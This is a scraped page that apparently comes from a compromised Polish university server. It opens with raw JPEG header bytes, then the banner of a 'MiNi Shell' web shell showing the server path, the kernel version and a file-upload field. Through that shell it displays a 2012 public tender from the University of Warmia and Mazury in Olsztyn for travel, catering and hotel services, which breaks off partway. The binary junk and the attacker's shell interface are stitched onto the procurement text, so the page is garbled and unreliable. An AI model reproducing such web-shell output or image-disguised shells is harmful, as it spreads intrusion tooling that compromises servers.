JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120229/47601-N-2012.html

<p class="kh_header"><b>Olsztyn: Zorganizowanie przejazdu i pobytu uczestników targów GREENPOWER, POLEKO, ENVIROMENT AND ENERGY  oraz uczestników sesji terenowej, świadczenie usługi cateringowej, hotelowej oraz autokarowej na rzecz  Uniwersytetu Warmińsko - Mazurskiego w Olsztynie, w ramach Projektu Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 47601 - 2012; data zamieszczenia: 29.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie przejazdu i pobytu uczestników targów GREENPOWER, POLEKO, ENVIROMENT AND ENERGY  oraz uczestników sesji terenowej, świadczenie usługi cateringowej, hotelowej oraz autokarowej na rzecz  Uniwersytetu Warmińsko - Mazurskiego w Olsztynie, w ramach Projektu Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie przejazdu i pobytu uczestników targów GREENPOWER, POLEKO, ENVIROMENT AND ENERGY  oraz uczestników sesji terenowej, świadczenie usługi cateringowej, hotelowej oraz autokarowej na rzecz  Uniwersytetu Warmińsko - Mazurskiego w Olsztynie, w ramach Projektu Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Przedmiot zmaówienia podzielony został na pięć części w tym: Część nr 1 Zorganizowanie przejazdu i pobytu uczestników/-czek targów w Polsce i zagranicą. Część nr 2.

Trzydniowa usługa cateringowa w Olsztynie dla BO i wykładowców na potrzeby 5-dniowych warsztatów Ochrona obszarów cennych przyrodniczo.
Część nr 3.

Zorganizowanie przejazdu i pobytu uczestników/-czek 2-dniowej sesji terenowej warsztatów oraz uczestników 3-dniowych zajęć terenowych.
Część nr 4.

Sukcesywne usługi hotelowe z wyżywieniem dla zaproszonych specjalistów i naukowców prowadzących wykłady zamawiane i Szkolenia.
Część nr 5.

Sukcesywne świadczenie usług autokarowego przewozu studentów i studentek z Olsztyna na miejsce ćwiczeń terenowych i z powrotem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 60.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 1:
W zakresie warunku dotyczącego posiadania wiedzy i doświadczenia Wykonawca wykaże, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie usługi polegające na zorganizowaniu wyjazdu i pobytu dla zorganizowanej grupy osób o wartości nie mniejszej niż 5 000,00 zł brutto, każda

Część nr 3:
W zakresie warunku dotyczącego posiadania wiedzy i doświadczenia Wykonawca wykaże, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie usługi polegające na zorganizowaniu wyjazdu i pobytu dla minimum 10-cio osobowej grupy o wartości nie mniejszej niż 10 000,00 zł brutto, każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego, formularz ofertowy sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie, formularz cenowy będący jednocześnie opisem przedmiotu zamówienia sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące:
a)	zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej,
b)	zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć przed jej zawarciem, pomimo zachowania należytej staranności.
3.	W przypadku zaistnienia sytuacji wskazanej w ust. 2, strony ustalają nowy termin  realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, ul. Oczapowskiego 2, 10-719 Olsztyn, pok. 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2012 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, ul. Oczapowskiego 2, 10-719 Olsztyn, pok. 310.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie realizowane jest w ramach projketu Kierunek zamawiany receptą na najlepszych ekspertów ochrony środowiska współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie przejazdu i pobytu uczestników/-czek targów w Polsce i zagranicą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Zorganizowanie przejazdu trzech uczestników/-czek na targi GREENPOWER w Poznaniu, Polska

Wykonawca jest zobowiązany do zorganizowania przejazdu uczestników/-czek targów z Olsztyna do miejsca zakwaterowania w Poznaniu oraz drogi powrotnej.

	1	usługa
2		Zorganizowanie zakwaterowania trzech uczestników/-czek targów GREENPOWER w Poznaniu, Polska

1.	Termin świadczenia usługi: 8-10 maja 2012 r.
2.	Miejsce świadczenia usługi: Poznań. 
3.	Warunki zakwaterowania dla trzech osób, dwa noclegi (3 osoby x 2 dni = 6 osobodni) - jeden pokój jednoosobowy oraz jeden pokój dwuosobowy ze śniadaniem. Pokoje powinny się znajdować w pobliżu Międzynarodowych Targów Poznańskich do 600 m, w pobliżu dworców PKP i PKS. Pokoje powinny być wyposażone w łazienkę, internet, telefon. 
4.	Standard zakwaterowania: Zespół Pokoi Gościnnych Instytutu Chemii Bioorganicznej Polskiej Akademii Nauk w Poznaniu lub równoważny z hotelem posiadającym standard nie mniejszy niż określony dla hoteli zaszeregowanych do kategorii ***(trzy gwiazdki) zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie
	1	usługa
3		Zorganizowanie wyżywienia trzech uczestników/-czek targów GREENPOWER w Poznaniu, Polska

1.	Warunki wyżywienia: trzy obiadokolacje (zupa, drugie danie, deser, napój) dla każdego BO w dniach 8.05.2012, 09.05.2012, 10.05.2012 (3 osoby x 3 dni = 9 osobodni). Wyżywienie w odległości maksymalnie 600 m od  Międzynarodowych Targów Poznańskich.
2.	Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).
	1	usługa
4		Zorganizowanie wstępu trzech uczestników/-czek na targi GREENPOWER w Poznaniu, Polska

1.	Wykonawca zapewni uczestnikom/-czkom (studentom/-tkom) bilety wstępu na targi na okres 3 dni.

	1	usługa
5		Zorganizowanie przejazdu trzech uczestników/-czek na targi POLEKO w Poznaniu, Polska

Wykonawca jest zobowiązany do zorganizowania przejazdu uczestników/-czek targów z Olsztyna do miejsca zakwaterowania w Poznaniu oraz drogi powrotnej.
	1	usługa
	Zorganizowanie zakwaterowania trzech uczestników/-czek targów POLEKO w Poznaniu, Polska

1.	Termin świadczenia usługi: 20-22 listopada 2012 r.
2.	Miejsce świadczenia usługi: Poznań. 
3.	Warunki zakwaterowania dla trzech osób, dwa noclegi (3 osoby x 2 dni = 6 osobodni) - jeden pokój jednoosobowy oraz jeden pokój dwuosobowy ze śniadaniem. Pokoje powinny się znajdować w pobliżu Międzynarodowych Targów Poznańskich do 600 m, w pobliżu dworców PKP i PKS. Pokoje powinny być wyposażone w łazienkę, internet, telefon. 
4.	Standard zakwaterowania: Zespół Pokoi Gościnnych Instytutu Chemii Bioorganicznej Polskiej Akademii Nauk w Poznaniu lub równoważny z hotelem posiadającym standard nie mniejszy niż określony dla hoteli zaszeregowanych do kategorii ***(trzy gwiazdki) zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie
	1	usługa
6		Zorganizowanie wyżywienia trzech uczestników/-czek targów POLEKO w Poznaniu, Polska

1.	Warunki wyżywienia: trzy obiadokolacje (zupa, drugie danie, deser, napój) dla każdego BO w dniach 20.11.2012, 21.11.2012, 22.11.2012 (3 osoby x 3 dni = 9 osobodni). Wyżywienie w odległości maksymalnie 600 m od  Międzynarodowych Targów Poznańskich.
2.	Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).
	1	usługa
7		Zorganizowanie wstępu trzech uczestników/-czek na targi POLEKO w Poznaniu, Polska

1. Wykonawca zapewni uczestnikom/-czkom (studentom/-tkom) bilety wstępu na targi na okres 3 dni.

	1	usługa
8		Zorganizowanie przejazdu trzech uczestników/-czek na targi ENVIRONMENT AND ENERGY w Rydze, Łotwa

Wykonawca jest zobowiązany do zorganizowania przejazdu uczestników/-czek targów z Olsztyna do miejsca zakwaterowania w Rydze oraz drogi powrotnej wraz z ewentualnym ubezpieczeniem uczestników/-czek (studentów/-tek).
	1	usługa
9		Zorganizowanie zakwaterowania trzech uczestników/-czek targów ENVIRONMENT AND ENERGY w Rydze, Łotwa

1.	Termin uczestnictwa studentów/-tek w targach: 18-20 października 2012 r.
2.	Miejsce świadczenia usługi: Ryga. 
3.	Warunki zakwaterowania dla trzech osób: jeden pokój jednoosobowy oraz jeden pokój dwuosobowy ze śniadaniem. Ilość noclegów uzależniona jest od sposobu zorganizowania przez Wykonawcę przejazdu i pobytu (minimum dwa noclegi). Pokoje powinny się znajdować w pobliżu International Exhibition Centre, Kipsalas, Ryga do 500 m. Pokoje powinny być wyposażone w łazienkę, internet, telefon, klimatyzację. 
4.	Standard zakwaterowania: Równoważny z hotelem posiadającym standard nie mniejszy niż określony dla hoteli zaszeregowanych do kategorii ****(cztery gwiazdki) zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie. 
	1	usługa
10		Zorganizowanie wyżywienia trzech uczestników/-czek targów ENVIRONMENT AND ENERGY w Rydze, Łotwa

1.	Warunki wyżywienia: całodzienne pełnoporcjowe wyżywienie w miejscu zakwaterowania - obiad (zupa, drugie danie, deser, napój), kolacja dla każdego BO w dniach: 18.10.2012, 19.10.2012, 20.10.2012 (3 osoby x 3 dni = 9 osobodni). 
2.	Świadczenie usług żywienia odbywać powinno się wg lokalnych przepisów sanitarnych w zakresie bezpieczeństwa żywności i żywienia.
	1	usługa
11		Zorganizowanie wstępu trzech uczestników/-czek na targi ENVIRONMENT AND ENERGY w Rydze, Łotwa

Wykonawca zapewni uczestnikom/-czkom (studentom/-tkom) bilety wstępu na targi na okres 3 dni.
	1	usługa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 60.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trzydniowa usługa cateringowa w Olsztynie dla BO i wykładowców na potrzeby 5-dniowych warsztatów Ochrona obszarów cennych przyrodniczo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Usługa cateringowa

Dzień pierwszy:

I przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
owoce (banany, winogrona, jabłka, owoce sezonowe) - 250g na osobę

II przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
ciasto - 3 rodzaje po 150 g na osobę

Dzień drugi:

I przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
owoce (banany, winogrona, jabłka, owoce sezonowe) - 250g na osobę

II przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
ciasto - 3 rodzaje po 150 g na osobę

Dzień trzeci:

I przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
owoce (banany, winogrona, jabłka, owoce sezonowe) - 250g na osobę

II przerwa: 
kawa, herbata - 0,4l na osobę
soki owocowe - 0,2l na osobę
woda - 0,2l na osobę 
ciasto - 3 rodzaje po 150 g na osobę

Dodatkowo cukier, cytryna, mleko do kawy dla każdego uczestnika, przygotowanie stołu - obrus, naczynia szklane, serwetki, obsługa w miejscu warsztatów.

Ilość osób: 20 studentów i studentek i 4 prowadzących warsztaty

Miejsce świadczenia usługi: Katedra Gleboznawstwa i Ochrony Gleb, 
Plac Łódzki 3, Olsztyn 
Szacunkowy termin wykonania usługi - kwiecień-czerwiec 2012, dokładny termin będzie określony najpóźniej na 14 dni przed realizacją zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie przejazdu i pobytu uczestników/-czek 2-dniowej sesji terenowej warsztatów oraz uczestników 3-dniowych zajęć terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Zorganizowanie przejazdu dwudziestu uczestników/-czek i dwóch opiekunów 2-dniowej sesji terenowej warsztatów

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012 r. 
2.	Zorganizowanie przejazdu autokarem klimatyzowanym według poniższej trasy: 
Dzień pierwszy: Olsztyn - Łeba; nocleg w Łebie (długość trasy około 350 km)
Dzień drugi: Łeba - Smołdzino - Kluki - Smołdzino - Olsztyn (długość trasy około 420 km). Autokar powinien posiadać czynną toaletę i GPS/mapę (nawigację satelitarną). W usługę transportową proszę wliczyć nocleg i wyżywienie kierowcy.

2		Zorganizowanie zakwaterowania dwudziestu uczestników/-czek i dwóch opiekunów podczas 2-dniowej sesji terenowej warsztatów

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012 r.
2.	Ilość uczestników 20 studentów/-ek i 2 opiekunów
3.	Zapewnienie 1 noclegu w Łebie w pensjonacie lub hotelu o standardzie minimum ***(trzy gwiazdki zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie) z restauracją i zabezpieczenie 10 pokoi dwuosobowych i 2 pokoje jednoosobowe dla studentów i studentek oraz opiekunów. Obiekt powinien się znajdować 300 m od morza i 150 m od centrum miasta. Pokoje powinny być wyposażone w pełny węzeł sanitarny (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (przewodowy lub wi-fi).
3		Zorganizowanie wyżywienia dwudziestu uczestników/-czek i dwóch opiekunów podczas 2-dniowej sesji terenowej warsztatów

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	Zapewnienie wyżywienia w miejscu noclegu dla 20 studentów/-ek i 2 opiekunów obejmującego:
a) pierwszego dnia kolację w formie bufetu szwedzkiego (w ilości adekwatnej do liczby uczestników): 
- danie na ciepło (3 do wyboru)
